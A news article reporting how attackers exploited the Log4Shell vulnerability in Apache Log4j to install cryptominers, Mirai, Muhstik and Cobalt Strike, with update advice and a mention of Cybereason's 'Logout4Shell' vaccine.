Cybercriminals are actively scanning the internet for the critical vulnerability Log4Shell CVE-2021-44228) in the Java-based Apache Log4j logging platform to install malware. The vulnerability allows attackers to remotely execute code on a vulnerable server.

When the vulnerability was first discovered, threat actors exploited the problem to execute shell scripts and install cryptominers. Shell script removes competing malware from the vulnerable device and then downloads and installs the Kinsing miner.

According to Netlab 360 experts, hackers use Log4Shell to install Mirai and Muhstik malware on vulnerable devices. These malware families install cryptominers and allow hackers to perform large-scale DDoS attacks. The attacks observed by experts were directed at devices running Linux.

Microsoft Threat Intelligence Center reported that vulnerability in Log4j was also used to install Cobalt Strike beacons.

Threat actors and security researchers use this exploit to scan the web for vulnerable servers and obtain information about them. Affected servers can be forced to access URLs or perform DNS requests for callback domains. This allows to determine if the server is vulnerable and use it for future attacks, research, or attempts to claim a bug bounty award.

Currently, there have been no reported cases of exploitation of the vulnerability by ransomware operators or APT, however, the deployment of Cobalt Strike beacons indicates upcoming malicious campaigns.

Users are strongly recommended to update to the latest version of Log4j in order to fix the vulnerability as soon as possible.

In addition, researchers from cybersecurity firm Cybereason has developed a "vaccine" that can be used to remotely eliminate a critical Log4Shell vulnerability. Although Apache quickly released a patched version of Log4j 2.15.0 to address the vulnerability, it is very easy to perform cyberattacks.

"Vaccine" disables settings in the remote vulnerable instance of Log4Shell. Essentially, the vaccine removes the vulnerability by exploiting the vulnerable server. A project called Logout4Shell contains a Java payload that disables the "trustURLCodebase" setting on the remote Log4j server.

You can track the list of affected vendors and software via the following URL:
https://www.cybersecurity-help.cz/reports/ApacheLog4J.php